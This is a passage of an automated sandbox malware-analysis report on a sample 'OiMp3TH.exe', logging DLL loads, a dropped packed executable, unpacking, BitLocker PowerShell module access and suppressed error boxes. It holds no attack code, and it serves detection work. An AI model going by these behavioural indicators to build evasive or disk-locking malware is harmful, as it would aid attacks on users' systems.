                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: version.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: wldp.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: profapi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: webio.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: schannel.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: amsi.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: userenv.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: OiMp3TH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: OiMp3TH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: OiMp3TH.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\source\repos\pthkkad\pthkkad\obj\Debug\pthkkad.pdb source: OiMp3TH.exe

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeUnpacked PE file: 7.2.ghhqoznpon_638708802577261661.exe.ea0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
                Source: OiMp3TH.exeStatic PE information: 0x8D363D39 [Fri Jan 27 15:01:13 2045 UTC]
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name:
                Source: C:\Users\user\Desktop\OiMp3TH.exeCode function: 0_2_03086FE0 push es; retf 0_2_03086FB3
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_0076BC90 push esi; iretd 7_3_0076BC91
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03956F24 push esi; retf 7_3_03956F27
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03956F24 push esi; retf 7_3_03956F27
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03955E64 push esi; retf 7_3_03955E67
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03955E64 push esi; retf 7_3_03955E67
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_00733408 pushad ; retf 0070h7_3_00733409
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03956F24 push esi; retf 7_3_03956F27
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03956F24 push esi; retf 7_3_03956F27
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03955E64 push esi; retf 7_3_03955E67
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeCode function: 7_3_03955E64 push esi; retf 7_3_03955E67
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name: entropy: 7.997894042340675
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name: entropy: 7.8446034009114705
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name: entropy: 7.910323865765355
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name: entropy: 7.889601543930096
                Source: ghhqoznpon_638708802577261661.exe.0.drStatic PE information: section name: .data entropy: 7.987204044077213
                Source: C:\Users\user\Desktop\OiMp3TH.exeFile created: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OiMp3TH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
